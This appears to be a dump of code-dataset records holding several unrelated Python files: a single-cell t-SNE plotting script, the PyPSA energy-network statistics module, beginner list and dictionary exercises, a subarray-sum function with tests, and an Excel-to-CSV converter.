for (go, x) in GO2X.items() if (go in GO) }\n\nGO2E = restrict(GO2E, GO2A.keys())\nGO2I = restrict(GO2I, GO2A.keys())\nGO2CI = restrict(GO2CI, GO2A.keys())\nGO2WQ = restrict(GO2WQ, GO2A.keys())\n\n\n## ===================== WORK :\n\n#[ ]#\n\n\ndef data_in_go_space(N=None, norm_features=True, norm_samples=True) :\n\t\n\t# Move to the GO feature space\n\tassert(axis_gene == 0)\n\tY = goordinate_trafo(sorted(GO2I.items()), n_genes) * X\n\t\n\t# Nontrivial features\n\tY = [(go, x) for (go, x) in zip(sorted(GO2I.keys()), Y.tolist()) if GO2WQ.get(go, None) and np.sum(x)]\n\t# Sort by \"clustering index windowed quantile\"\n\tY = sorted(Y, key=(lambda go_x : GO2WQ[go_x[0]]))\n\t\n\t# Split GO ID / Data \n\t(GO, Y) = zip(*Y)\n\t\n\t# Filter by size\n\t(GO, Y) = zip(*[(go, y) for (go, y) in zip(GO, Y) if (len(GO2E[go]) <= 9)])\n\t\n\t# Take the first N \n\tif N :\n\t\t(GO, Y) = zip(*[(go, y) for (go, y) in list(zip(GO, Y))[0:N]])\n\t\n\t# Collect the features into a numpy matrix row-wise\n\tY = np.vstack(Y)\n\t\n\t# Normalize data feature-wise\n\tif norm_features : \n\t\tY = np.vstack((y / (np.sum(y) or 1)) for y in Y)\n\t\n\t## Normalize data sample-wise\n\t#if norm_samples :\n\t\t#Y = np.vstack((s / (np.sum(s) or 1)) for s in Y.transpose()).transpose()\n\t\n\treturn (GO, Y)\n\n\ndef plot_CI_vs_N() :\n\tpass\n\n\n\ndef compute_all_tSNE_in_go_space() :\n\t\n\truns_filename = IFILE['tsne runs']\n\t\n\tassert(os.path.isfile(runs_filename)), (\"File {} with t-SNE not found.\".format(runs_filename))\n\n\treturn pickle.load(open(runs_filename, 'rb'))['runs']\n\n\ndef plot_tSNE_in_go_space() :\n\t\n\t# Predicted class\n\tYp = pickle.load(open(IFILE['classified'], 'rb'))['Yp']\n\tassert(Yp.shape[0] == n_samples)\n\t\n\tfor run_info in compute_all_tSNE_in_go_space() :\n\t\t\n\t\tZ = run_info['Z']\n\t\tN = run_info['N']\n\t\trun = run_info['run']\n\t\t# run_info['GO']\n\t\n\t\t# Log the selected GO terms to file (including redundancies)\n\t\twith open(OFILE['tsne info'].format(dim=N), 'w') as f :\n\t\t\tfor go in run_info['GO'] :\n\t\t\t\tprint(go, len(GO2E[go]), GO2T[go], \" / \".join([(i + \" -- \" + GO2T[i]) for i in GO2A[go][1:]]), sep='\\t', file=f)\n\t\t\n\t\tcm_a = plt.cm.winter\n\t\tcm_b = plt.cm.cool\n\t\tcm_c = plt.cm.autumn_r\n\t\t\n\t\t# Legend and colors for the tumors\n\t\t(L, c) = zip(*[\n\t\t\t( \"BC01 (ER+)\", cm_a(0.0) ),\n\t\t\t( \"BC02 (ER+)\", cm_a(0.4) ),\n\t\t\t\n\t\t\t( \"BC03 (ER+, HER2+)\", cm_a(0.7) ),\n\t\t\t( \"BC03LN\", cm_a(1.0) ),\n\t\t\t\n\t\t\t( \"BC04 (HER2+)\", cm_b(0.3) ),\n\t\t\t( \"BC05 (HER2+)\", cm_b(0.5) ),\n\t\t\t( \"BC06 (HER2+)\", cm_b(0.9) ),\n\t\t\t\n\t\t\t( \"BC07 (TNBC)\", cm_c(0.0) ),\n\t\t\t( \"BC07LN\", cm_c(0.1) ),\n\t\t\t( \"BC08 (TNBC)\", cm_c(0.3) ),\n\t\t\t( \"BC09 (TNBC)\", cm_c(0.5) ),\n\t\t\t( \"BC09_Re\", cm_c(0.6) ),\n\t\t\t( \"BC10 (TNBC)\", cm_c(0.8) ),\n\t\t\t( \"BC11 (TNBC)\", cm_c(1.0) ),\n\t\t])\n\t\t#\n\t\t# Check that the legend corresponds to the cell groups\n\t\tassert(all((l.startswith(k) for (l, k) in zip(L, sorted(G2S.keys())))))\n\t\t#\n\t\t# The number of samples will be filled in later\n\t\tL = [(\"{} x \" + l) for l in L]\n\t\t\n\t\tplt.close('all')\n\t\t\n\t\t# Clean the axes\n\t\tplt.xticks([], [])#; plt.xlabel(\"t-SNE 1\")\n\t\tplt.yticks([], [])#; plt.ylabel(\"t-SNE 2\")\n\t\t\n\t\t# Handles and texts for the legend\n\t\tHL = []\n\t\t\n\t\tfor background in [True, False] :\n\t\t\t# Iterate over the cell groups\n\t\t\tfor (n, (g, s)) in enumerate(sorted(G2S.items())) :\n\t\t\t\t\n\t\t\t\t# NN classification of this sample into this group\n\t\t\t\tsz = 5 + (30 * Yp[s, n])\n\t\t\t\n\t\t\t\tif background :\n\t\t\t\t\t# Scatter plot with no color\n\t\t\t\t\tplt.scatter(*Z[:, s], s=sz, facecolors='None', edgecolors='k', lw=0.1)\n\t\t\t\t\n\t\t\t\telse :\n\t\t\t\t\t# For one particular configuration:\n\t\t\t\t\t# Save intermediate plots showing individual groups better\n\t\t\t\t\tif ( (N, run) == (20, 1) ) :\n\t\t\t\t\t\tfor ext in PARAM['ext'] : \n\t\t\t\t\t\t\tplt.savefig(OFILE['tsne'].format(dim=N, run=run, sub=n, ext=ext))\n\t\t\t\t\t\n\t\t\t\t\t# Keep only the \"healthy\" cells, assuming most cells are healthy\n\t\t\t\t\ts = [c for c in s if (np.mean(X[:, c]) >= np.median(X[:, c])/2)]\n\t\t\t\t\t\n\t\t\t\t\t# Scatter plot of the cell group\n\t\t\t\t\th = plt.scatter(*Z[:, s], alpha=0.8, c=c[n], s=sz, edgecolors='k', lw=0.2)\n\t\t\t\t\t\n\t\t\t\t\t# Fill in the number of samples in the legend\n\t\t\t\t\tHL.append(( h, L[n].format(len(s)) ))\n\t\t\t\t\t\n\t\t\t\t\tplt.legend(*zip(*HL), prop={'size': 5}, loc='upper left')\n\t\t\n\t\tfor ext in PARAM['ext'] : \n\t\t\tplt.savefig(OFILE['tsne'].format(dim=N, run=run, sub=\"all\", ext=ext))\n\n###\n\nif (__name__ == \"__main__\") :\n\tplot_tSNE_in_go_space()\n","sub_path":"p/single-cell/20171130-BCXX/C_goordinates-D.py","file_name":"C_goordinates-D.py","file_ext":"py","file_size_in_byte":10375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"272184029","text":"# -*- coding: utf-8 -*-\n\"\"\"\nStatistics Accessor.\n\"\"\"\n\n\n__author__ = (\n \"PyPSA Developers, see https://pypsa.readthedocs.io/en/latest/developers.html\"\n)\n__copyright__ = (\n \"Copyright 2015-2023 PyPSA Developers, see https://pypsa.readthedocs.io/en/latest/developers.html, \"\n \"MIT License\"\n)\n\nimport logging\nfrom functools import wraps\n\nimport numpy as np\nimport pandas as pd\n\nfrom pypsa.descriptors import nominal_attrs\n\nlogger = logging.getLogger(__name__)\n\n\ndef get_carrier(n, c):\n \"\"\"\n Get the nice carrier names for a component.\n \"\"\"\n df = n.df(c)\n fall_back = pd.Series(\"\", index=df.index)\n return (\n df.get(\"carrier\", fall_back)\n .replace(n.carriers.nice_name[lambda ds: ds != \"\"])\n .replace(\"\", \"-\")\n .rename(\"carrier\")\n )\n\n\ndef get_bus_and_carrier(n, c, port=\"\"):\n \"\"\"\n Get the buses and nice carrier names for a component.\n \"\"\"\n if port == \"\":\n if \"bus\" not in n.df(c):\n bus = \"bus0\"\n else:\n bus = \"bus\"\n else:\n bus = f\"bus{port}\"\n return [n.df(c)[bus].rename(\"bus\"), get_carrier(n, c)]\n\n\ndef get_country_and_carrier(n, c, port=\"\"):\n \"\"\"\n Get component country and carrier.\n \"\"\"\n bus = f\"bus{port}\"\n bus, carrier = get_bus_and_carrier(n, c, port)\n country = bus.map(n.buses.country).rename(\"country\")\n return [country, carrier]\n\n\ndef get_carrier_and_bus_carrier(n, c, port=\"\"):\n \"\"\"\n Get component carrier and bus carrier in one combined DataFrame.\n\n Used for MultiIndex in energy balance.\n \"\"\"\n bus = f\"bus{port}\"\n bus_and_carrier = pd.concat(get_bus_and_carrier(n, c, port), axis=1)\n bus_carrier = n.df(c)[bus].map(n.buses.carrier).rename(\"bus_carrier\")\n return pd.concat([bus_and_carrier, bus_carrier], axis=1)\n\n\ndef get_operation(n, c):\n \"\"\"\n Get the operation time series of a component.\n \"\"\"\n if c in n.branch_components:\n return n.pnl(c).p0\n elif c == \"Store\":\n return n.pnl(c).e\n else:\n return n.pnl(c).p\n\n\ndef get_weightings(n, c):\n \"\"\"\n Get the relevant snapshot weighting for a component.\n \"\"\"\n if c == \"Generator\":\n return n.snapshot_weightings[\"generators\"]\n elif c in [\"StorageUnit\", \"Store\"]:\n return n.snapshot_weightings[\"stores\"]\n else:\n return n.snapshot_weightings[\"objective\"]\n\n\ndef aggregate_timeseries(df, weights, agg=\"sum\"):\n \"Calculate the weighed sum or average of a DataFrame or Series.\"\n if agg == \"mean\":\n return df.multiply(weights, axis=0).sum().div(weights.sum())\n elif agg == \"sum\":\n return weights @ df\n elif not agg:\n return df.T\n else:\n return df.agg(agg)\n\n\ndef aggregate_components(n, func, agg=\"sum\", comps=None, groupby=None):\n \"\"\"\n Apply a function and group the result for a collection of components.\n \"\"\"\n d = {}\n kwargs = {}\n if comps is None:\n comps = n.branch_components | n.one_port_components\n if groupby is None:\n groupby = get_carrier\n for c in comps:\n if callable(groupby):\n grouping = groupby(n, c)\n elif isinstance(groupby, list):\n grouping = [n.df(c)[key] for key in groupby]\n elif isinstance(groupby, str):\n grouping = n.df(c)[groupby]\n elif isinstance(groupby, dict):\n grouping = None\n kwargs = groupby\n else:\n ValueError(\n f\"Argument `groupby` must be a function, list, string or dict, got {type(groupby)}\"\n )\n d[c] = func(n, c).groupby(grouping, **kwargs).agg(agg)\n return pd.concat(d)\n\n\ndef pass_empty_series_if_keyerror(func):\n @wraps(func)\n def wrapper(*args, **kwargs):\n try:\n return func(*args, **kwargs)\n except (KeyError, AttributeError):\n return pd.Series([], dtype=float)\n\n return wrapper\n\n\nclass StatisticsAccessor:\n \"\"\"\n Accessor to calculate different statistical values.\n \"\"\"\n\n def __init__(self, network):\n self._parent = network\n\n def __call__(\n self,\n comps=None,\n aggregate_groups=\"sum\",\n groupby=get_carrier,\n **kwargs,\n ):\n \"\"\"\n Calculate statistical values for a network.\n\n This function calls multiple function in the background in order to\n derive a full table of relevant network information. It groups the\n values to components according to the groupby argument.\n\n Parameters\n ----------\n comps: list-like\n Set of components to consider. Defaults to one-port and branch\n components.\n aggregate_groups : str, optional\n Type of aggregation when component groups. The default is 'sum'.\n groupby : callable, list, str, optional\n Specification how to group assets within one component class.\n If a function is passed, it should have the arguments network and\n component name. If a list is passed it should contain\n column names of the static DataFrame, same for a single string.\n Defaults to `get_carrier`.\n\n Returns\n -------\n df :\n pandas.DataFrame with columns given the different quantities.\n \"\"\"\n if \"aggregate_time\" in kwargs:\n logger.warning(\n \"Argument 'aggregate_time' ignored in overview table. Falling back to individual function defaults.\"\n )\n\n funcs = [\n self.capex,\n self.optimal_capacity,\n self.installed_capacity,\n self.opex,\n self.supply,\n self.withdrawal,\n self.dispatch,\n self.curtailment,\n self.capacity_factor,\n self.revenue,\n self.market_value,\n ]\n kwargs = dict(comps=comps, aggregate_groups=aggregate_groups, groupby=groupby)\n res = []\n for func in funcs:\n df = func(**kwargs)\n res.append(df.rename(df.attrs[\"name\"]))\n return pd.concat(res, axis=1).sort_index(axis=0).sort_index(axis=1)\n\n def get_carrier(self, n, c):\n \"\"\"\n Get the buses and nice carrier names for a component.\n \"\"\"\n return get_carrier(n, c)\n\n def get_bus_and_carrier(self, n, c):\n \"\"\"\n Get the buses and nice carrier names for a component.\n \"\"\"\n return get_bus_and_carrier(n, c)\n\n def get_country_and_carrier(self, n, c):\n \"\"\"\n Get the country and nice carrier names for a component.\n \"\"\"\n return get_country_and_carrier(n, c)\n\n def capex(self, comps=None, aggregate_groups=\"sum\", groupby=None):\n \"\"\"\n Calculate the capital expenditure of the network in given currency.\n\n For information on the list of arguments, see the docs in\n `Network.statistics` or `pypsa.statistics.StatisticsAccessor`.\n \"\"\"\n n = self._parent\n\n @pass_empty_series_if_keyerror\n def func(n, c):\n return n.df(c).eval(f\"{nominal_attrs[c]}_opt * capital_cost\")\n\n df = aggregate_components(\n n, func, comps=comps, agg=aggregate_groups, groupby=groupby\n )\n df.attrs[\"name\"] = \"Capital Expenditure\"\n df.attrs[\"unit\"] = \"currency\"\n return df\n\n def installed_capex(self, comps=None, aggregate_groups=\"sum\", groupby=None):\n \"\"\"\n Calculate the capital expenditure of already built components of the\n network in given currency.\n\n For information on the list of arguments, see the docs in\n `Network.statistics` or `pypsa.statistics.StatisticsAccessor`.\n \"\"\"\n n = self._parent\n\n @pass_empty_series_if_keyerror\n def func(n, c):\n return n.df(c).eval(f\"{nominal_attrs[c]} * capital_cost\")\n\n df = aggregate_components(\n n, func, comps=comps, agg=aggregate_groups, groupby=groupby\n )\n df.attrs[\"name\"] = \"Capital Expenditure Fixed\"\n df.attrs[\"unit\"] = \"currency\"\n return df\n\n def optimal_capacity(self, comps=None, aggregate_groups=\"sum\", groupby=None):\n \"\"\"\n Calculate the optimal capacity of the network components in MW.\n\n For information on the list of arguments, see the docs in\n `Network.statistics` or `pypsa.statistics.StatisticsAccessor`.\n \"\"\"\n n = self._parent\n\n @pass_empty_series_if_keyerror\n def func(n, c):\n return n.df(c)[f\"{nominal_attrs[c]}_opt\"]\n\n df = aggregate_components(\n n, func, comps=comps, agg=aggregate_groups, groupby=groupby\n )\n df.attrs[\"name\"] = \"Optimal Capacity\"\n df.attrs[\"unit\"] = \"MW\"\n return df\n\n def installed_capacity(self, comps=None, aggregate_groups=\"sum\", groupby=None):\n \"\"\"\n Calculate the installed capacity of the network components in MW.\n\n For information on the list of arguments, see the docs in\n `Network.statistics` or `pypsa.statistics.StatisticsAccessor`.\n \"\"\"\n n = self._parent\n\n @pass_empty_series_if_keyerror\n def func(n, c):\n return n.df(c)[f\"{nominal_attrs[c]}\"]\n\n df = aggregate_components(\n n, func, comps=comps, agg=aggregate_groups, groupby=groupby\n )\n df.attrs[\"name\"] = \"Installed Capacity\"\n df.attrs[\"unit\"] = \"MW\"\n return df\n\n def expanded_capacity(self, comps=None, aggregate_groups=\"sum\", groupby=None):\n \"\"\"\n Calculate the expanded capacity of the network components in MW.\n\n For information on the list of arguments, see the docs in\n `Network.statistics` or `pypsa.statistics.StatisticsAccessor`.\n \"\"\"\n df = self.optimal_capacity(\n comps=comps, aggregate_groups=aggregate_groups, groupby=groupby\n ) - self.installed_capacity(\n comps=comps, aggregate_groups=aggregate_groups, groupby=groupby\n )\n df.attrs[\"name\"] = \"Expanded Capacity\"\n df.attrs[\"unit\"] = \"MW\"\n return df\n\n def opex(\n self,\n comps=None,\n aggregate_time=\"sum\",\n aggregate_groups=\"sum\",\n groupby=None,\n ):\n \"\"\"\n Calculate the operational expenditure in the network in given currency.\n\n For information on the list of arguments, see the docs in\n `Network.statistics` or `pypsa.statistics.StatisticsAccessor`.\n\n Parameters\n ----------\n aggregate_time : str, bool, optional\n Type of aggregation when aggregating time series.\n Note that for {'mean', 'sum'} the time series are aggregated\n using snapshot weightings. With False the time series is given. Defaults to 'sum'.\n \"\"\"\n n = self._parent\n\n @pass_empty_series_if_keyerror\n def func(n, c):\n if c in n.branch_components:\n p = n.pnl(c).p0\n elif c == \"StorageUnit\":\n p = n.pnl(c).p_dispatch\n else:\n p = n.pnl(c).p\n opex = p * n.get_switchable_as_dense(c, \"marginal_cost\")\n weights = get_weightings(n, c)\n return aggregate_timeseries(opex, weights, agg=aggregate_time)\n\n df = aggregate_components(\n n, func, comps=comps, agg=aggregate_groups, groupby=groupby\n )\n df.attrs[\"name\"] = \"Operational Expenditure\"\n df.attrs[\"unit\"] = \"currency\"\n return df\n\n def supply(\n self,\n comps=None,\n aggregate_time=\"sum\",\n aggregate_groups=\"sum\",\n groupby=None,\n ):\n \"\"\"\n Calculate the supply of components in the network. Units depend on the\n regarded bus carrier.\n\n For information on the list of arguments, see the docs in\n `Network.statistics` or `pypsa.statitics.StatisticsAccessor`.\n \"\"\"\n n = self._parent\n\n @pass_empty_series_if_keyerror\n def func(n, c):\n if c in n.branch_components:\n p = -n.pnl(c).p0.clip(upper=0)\n p -= n.pnl(c).p1.clip(upper=0)\n else:\n p = (n.pnl(c).p * n.df(c).sign).clip(lower=0)\n weights = get_weightings(n, c)\n return aggregate_timeseries(p, weights, agg=aggregate_time)\n\n df = aggregate_components(\n n, func, comps=comps, agg=aggregate_groups, groupby=groupby\n )\n df.attrs[\"name\"] = \"Supply\"\n df.attrs[\"unit\"] = \"carrier dependent\"\n return df\n\n def withdrawal(\n self,\n comps=None,\n aggregate_time=\"sum\",\n aggregate_groups=\"sum\",\n groupby=None,\n ):\n \"\"\"\n Calculate the withdrawal of components in the network. Units depend on\n the regarded bus carrier.\n\n For information on the list of arguments, see the docs in\n `Network.statistics` or `pypsa.statitics.StatisticsAccessor`.\n \"\"\"\n n = self._parent\n\n @pass_empty_series_if_keyerror\n def func(n, c):\n if c in n.branch_components:\n p = -(n.pnl(c).p0).clip(lower=0)\n p -= n.pnl(c).p1.clip(lower=0)\n else:\n p = (n.pnl(c).p * n.df(c).sign).clip(upper=0)\n weights = get_weightings(n, c)\n return aggregate_timeseries(p, weights, agg=aggregate_time)\n\n df = aggregate_components(\n n, func, comps=comps, agg=aggregate_groups, groupby=groupby\n )\n df.attrs[\"name\"] = \"Withdrawal\"\n df.attrs[\"unit\"] = \"carrier dependent\"\n return df\n\n def dispatch(\n self,\n comps=None,\n aggregate_time=\"sum\",\n aggregate_groups=\"sum\",\n groupby=None,\n ):\n \"\"\"\n Calculate the dispatch of components in the network. Units depend on\n the regarded bus carrier.\n\n For information on the list of arguments, see the docs in\n `Network.statistics` or `pypsa.statistics.StatisticsAccessor`.\n\n Parameters\n ----------\n aggregate_time : str, bool, optional\n Type of aggregation when aggregating time series.\n Note that for {'mean', 'sum'} the time series are aggregated to MWh\n using snapshot weightings. With False the time series is given in MW. Defaults to 'sum'.\n \"\"\"\n n = self._parent\n\n @pass_empty_series_if_keyerror\n def func(n, c):\n if c in n.branch_components:\n p = -n.pnl(c).p0\n else:\n p = n.pnl(c).p * n.df(c).sign\n weights = get_weightings(n, c)\n return aggregate_timeseries(p, weights, agg=aggregate_time)\n\n df = aggregate_components(\n n, func, comps=comps, agg=aggregate_groups, groupby=groupby\n )\n df.attrs[\"name\"] = \"Dispatch\"\n df.attrs[\"unit\"] = \"carrier dependent\"\n return df\n\n def energy_balance(\n self,\n comps=None,\n aggregate_time=\"sum\",\n aggregate_groups=\"sum\",\n aggregate_bus=True,\n ):\n \"\"\"\n Calculate the energy balance of components in the network. Positive\n values represent a supply and negative a withdrawal. Units depend on\n the regarded bus carrier.\n\n For information on the list of arguments, see the docs in\n `Network.statistics` or `pypsa.statistics.StatisticsAccessor`.\n\n Additional parameter\n ----------\n aggregate_bus: bool, optional\n Whether to obtain the nodal or carrier-wise energy balance. Default is True, corresponding to the carrier-wise balance.\n aggregate_time : str, bool, optional\n Type of aggregation when aggregating time series.\n Note that for {'mean', 'sum'} the time series are aggregated to MWh\n using snapshot weightings. With False the time series is given in MW. Defaults to 'sum'.\n \"\"\"\n n = self._parent\n\n @pass_empty_series_if_keyerror\n def func(n, c):\n sign = -1 if c in n.branch_components else n.df(c).get(\"sign\", 1)\n ports = [col[3:] for col in n.df(c).columns if col[:3] == \"bus\"]\n p = list()\n for port in ports:\n mask = n.df(c)[f\"bus{port}\"] != \"\"\n df = sign * n.pnl(c)[f\"p{port}\"].loc[:, mask]\n index = get_carrier_and_bus_carrier(n, c, port=port)[mask]\n df.columns = pd.MultiIndex.from_frame(index.reindex(df.columns))\n p.append(df)\n p = pd.concat(p, axis=1)\n weights = get_weightings(n, c)\n return aggregate_timeseries(p, weights, agg=aggregate_time)\n\n groupby = [\"carrier\", \"bus_carrier\"]\n if not aggregate_bus:\n groupby.append(\"bus\")\n\n df = aggregate_components(\n n,\n func,\n comps=comps,\n agg=aggregate_groups,\n groupby={\"level\": groupby},\n )\n df.attrs[\"name\"] = \"Energy Balance\"\n df.attrs[\"unit\"] = \"carrier dependent\"\n return df\n\n def curtailment(\n self,\n comps=None,\n aggregate_time=\"sum\",\n aggregate_groups=\"sum\",\n groupby=None,\n ):\n \"\"\"\n Calculate the curtailment of components in the network in MWh.\n\n The calculation only considers assets with a `p_max_pu` time\n series, which is used to quantify the available power potential.\n\n For information on the list of arguments, see the docs in\n `Network.statistics` or `pypsa.statistics.StatisticsAccessor`.\n\n Parameters\n ----------\n aggregate_time : str, bool, optional\n Type of aggregation when aggregating time series.\n Note that for {'mean', 'sum'} the time series are aggregated to MWh\n using snapshot weightings. With False the time series is given in MW. Defaults to 'sum'.\n \"\"\"\n n = self._parent\n\n @pass_empty_series_if_keyerror\n def func(n, c):\n p = (n.pnl(c).p_max_pu * n.df(c).p_nom_opt - n.pnl(c).p).clip(lower=0)\n weights = get_weightings(n, c)\n return aggregate_timeseries(p, weights, agg=aggregate_time)\n\n df = aggregate_components(\n n, func, comps=comps, agg=aggregate_groups, groupby=groupby\n )\n df.attrs[\"name\"] = \"Curtailment\"\n df.attrs[\"unit\"] = \"MWh\"\n return df\n\n def capacity_factor(\n self,\n comps=None,\n aggregate_time=\"mean\",\n aggregate_groups=\"sum\",\n groupby=None,\n ):\n \"\"\"\n Calculate the capacity factor of components in the network.\n\n For information on the list of arguments, see the docs in\n `Network.statistics` or `pypsa.statistics.StatisticsAccessor`.\n\n Parameters\n ----------\n aggregate_time : str, bool, optional\n Type of aggregation when aggregating time series.\n Note that for {'mean', 'sum'} the time series are aggregated to\n using snapshot weightings. With False the time series is given. Defaults to 'mean'.\n \"\"\"\n n = self._parent\n\n @pass_empty_series_if_keyerror\n def func(n, c):\n p = get_operation(n, c).abs()\n weights = get_weightings(n, c)\n return aggregate_timeseries(p, weights, agg=aggregate_time)\n\n df = aggregate_components(\n n, func, comps=comps, agg=aggregate_groups, groupby=groupby\n )\n capacity = self.optimal_capacity(\n comps=comps, aggregate_groups=aggregate_groups, groupby=groupby\n )\n df = df.div(capacity, axis=0)\n df.attrs[\"name\"] = \"Capacity Factor\"\n df.attrs[\"unit\"] = \"p.u.\"\n return df\n\n def revenue(\n self,\n comps=None,\n aggregate_time=\"sum\",\n aggregate_groups=\"sum\",\n groupby=None,\n ):\n \"\"\"\n Calculate the revenue of components in the network in given currency.\n\n For information on the list of arguments, see the docs in\n `Network.statistics` or `pypsa.statistics.StatisticsAccessor`.\n\n Parameters\n ----------\n aggregate_time : str, bool, optional\n Type of aggregation when aggregating time series.\n Note that for {'mean', 'sum'} the time series are aggregated to\n using snapshot weightings. With False the time series is given. Defaults to 'sum'.\n \"\"\"\n n = self._parent\n\n @pass_empty_series_if_keyerror\n def func(n, c):\n if c in n.one_port_components:\n prices = n.buses_t.marginal_price.reindex(columns=n.df(c).bus)\n prices.columns = n.df(c).index\n revenue = n.pnl(c).p * prices\n else:\n prices0 = n.buses_t.marginal_price.reindex(columns=n.df(c).bus0)\n prices0.columns = n.df(c).index\n prices1 = n.buses_t.marginal_price.reindex(columns=n.df(c).bus1)\n prices1.columns = n.df(c).index\n revenue = -(n.pnl(c).p0 * prices0 + n.pnl(c).p1 * prices1)\n weights = get_weightings(n, c)\n return aggregate_timeseries(revenue, weights, agg=aggregate_time)\n\n df = aggregate_components(\n n, func, comps=comps, agg=aggregate_groups, groupby=groupby\n )\n df.attrs[\"name\"] = \"Revenue\"\n df.attrs[\"unit\"] = \"currency\"\n return df\n\n def market_value(\n self,\n comps=None,\n aggregate_time=\"mean\",\n aggregate_groups=\"sum\",\n groupby=None,\n ):\n \"\"\"\n Calculate the market value of components in the network in given\n currency/MWh.\n\n For information on the list of arguments, see the docs in\n `Network.statistics` or `pypsa.statistics.StatisticsAccessor`.\n\n Parameters\n ----------\n aggregate_time : str, bool, optional\n Type of aggregation when aggregating time series.\n Note that for {'mean', 'sum'} the time series are aggregated to\n using snapshot weightings. With False the time series is given. Defaults to 'mean'.\n \"\"\"\n kwargs = dict(\n comps=comps,\n aggregate_time=aggregate_time,\n aggregate_groups=aggregate_groups,\n groupby=groupby,\n )\n df = self.revenue(**kwargs) / self.dispatch(**kwargs)\n df.attrs[\"name\"] = \"Market Value\"\n df.attrs[\"unit\"] = \"currency / MWh\"\n return df\n","sub_path":"pypsa/statistics.py","file_name":"statistics.py","file_ext":"py","file_size_in_byte":22431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"438225323","text":"#Murad Munchaev\n# Задача-1:\n# Дан список фруктов.\n# Напишите программу, выводящую фрукты в виде нумерованного списка,\n# выровненного по правой стороне.\n\n\n# Пример:\n# Дано: [\"яблоко\", \"банан\", \"киви\", \"арбуз\"]\n# Вывод:\n# 1. яблоко\n# 2. банан\n# 3. киви\n# 4. арбуз\n\n# Подсказка: воспользоваться методом .format()\n\nfruits = ['APPLE', 'MELON', 'Банан', 'Арбуз', 'Абрикос', 'Апельсин']\nfor num, frut in enumerate (fruits,1):\n print (str(num) + '. {:>8}'.format(frut))\n\n\n# Задача-2:\n# Даны два произвольные списка.\n# Удалите из первого списка элементы, присутствующие во втором списке и выведите результат.\nspisok1 = ['Книга', 'Тетрадь', 'Ручка', 'Шар', 'Парта', 'Перо', 'Телефон', 3, -5, 1000]\nspisok2 = ['Книга', 'Шар', 'Парта', 'Телефон', 'Карандаш', -5]\nprint('Первый список: {}'.format(spisok1))\nprint('Второй список: {}'.format(spisok2))\n\nfor el in spisok1[:]:\n for el2 in spisok2[:]:\n if el2 == el:\n spisok1.remove(el2)\nprint('Элементы из первого списка, которых нет во втором: {}'.format(spisok1))\n\n\n# Задача-3:\n# Дан произвольный список из целых чисел.\n# Получите НОВЫЙ список из элементов исходного, выполнив следующие условия:\n# если элемент кратен двум, то разделить его на 4, если не кратен, то умножить на два.\n# и выведите результат\n","sub_path":"lesson_02/home_work/hw02_easy.py","file_name":"hw02_easy.py","file_ext":"py","file_size_in_byte":1902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"179468777","text":"recipe = {'carrots': 4, 'apples': 10, 'water': 10}\n#print(recipe['apples'])\n\nstudents = [{'name': 'frederik',\n 'age': 21,\n 'nationality': ['German', 'Indonesian'],\n 'student_ID': 1},\n {'name': 'melissa',\n 'age': 218,\n 'nationality': 'NewZealandish',\n 'student_ID': 2},\n {'name': 'casey',\n 'age': 10,\n 'nationality': 'United States',\n 'student_ID': 3},\n ]\n\nfor student in students:\n print(student['age'])\n\n\n#print(students[0]['nationality'][0])\n\nstudents[1]['home country'] = None\nprint(students[1])\n\nhome = students[1].pop('home country')\n\nprint(students[1])\nprint(home)\n\n\n#print(recipe)\n","sub_path":"02_26_tue/dictionaries.py","file_name":"dictionaries.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"169417836","text":"from __future__ import absolute_import\nimport unittest\n\n\ndef subarray_sum_to_target(numbers, target):\n \"\"\"\n Determine the contiguous sub-array whose elements all sum to the target number\n\n :param numbers: Unsorted array of positive integer numbers\n :param target: The target value of the sub-array's sum\n\n :return: The subarray whose element all sum to the target\n \"\"\"\n\n \"\"\"\n Create a sub-array define by the lower and upper bounds starting at indices 0 and 1\n Depending on the sub-array's sum compared to the target sum, we'll expand the array by including the next number\n or shrink the sub-array by excluding the leftmost number.\n \"\"\"\n start = 0\n end = 1\n current_sum = numbers[start]\n\n while end < len(numbers):\n if current_sum < target:\n # The target is still larger than our sub-array's sum, expand the upper bound by one\n current_sum += numbers[end]\n end += 1\n elif current_sum > target:\n # The target is smaller than our sub-array's sum, shrink the sub-array by removing the leftmost element\n current_sum -= numbers[start]\n start += 1\n else:\n break\n\n return numbers[start: end]\n\n\nclass SubarraySumToTargetTest(unittest.TestCase):\n\n def test_valid(self):\n self.assertEquals(subarray_sum_to_target([1, 4, 20, 3, 10, 5], 33), [20, 3, 10])\n self.assertEquals(subarray_sum_to_target([1, 4, 0, 0, 3, 10, 5], 7), [4, 0, 0, 3])\n self.assertEqual(subarray_sum_to_target([1, 3, 10, 5, 1, 6], 16), [10, 5, 1])\n\n def test_invalid(self):\n self.assertEquals(subarray_sum_to_target([1, 4], 0), [])\n\nif __name__ == \"__main__\":\n unittest.main()","sub_path":"python/subarray_sum_to_target.py","file_name":"subarray_sum_to_target.py","file_ext":"py","file_size_in_byte":1718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"246713709","text":"import sys\nimport os\nimport pandas as pd\nimport numpy as np\nfrom datetime import datetime\nimport xlrd\nimport csv\nimport sys\nimport timeit\nimport datetime\nsheetsPath = 'ANZLUsheets/'\n\n#----------------------------------------------------------------------\ndef open_file(path):\n workbook = xlrd.open_workbook(path)\n print(workbook.nsheets)\n csv_file_base_path = '';\n for sheet_name in workbook.sheet_names():\n print(sheet_name)\n #sheet_name = workbook.sheet_names()\n worksheet = workbook.sheet_by_name(sheet_name)\n\n csv_file_full_path = csv_file_base_path + sheet_name.lower().replace(\" - \", \"_\").replace(\" \",\"_\") + '.csv'\n csvfile = open(csv_file_full_path, 'w')\n writetocsv = csv.writer(csvfile, quoting = csv.QUOTE_ALL)\n for rownum in range(worksheet.nrows):\n #print(rownum, 'this is row num')\n rownum = int(rownum)\n #print(type(rownum), 'this is type')\n #print(worksheet.row_values(rownum))\n writetocsv.writerow(worksheet.row_values(rownum))\n\n csvfile.close()\n\n\n\n\n#----------------------------------------------------------------------\n\n\n'''if [f for f in os.listdir(sheetsPath)] == []:\n print(\"empty\")\n open_file('ANZLU.xlsx')\nelse: \n 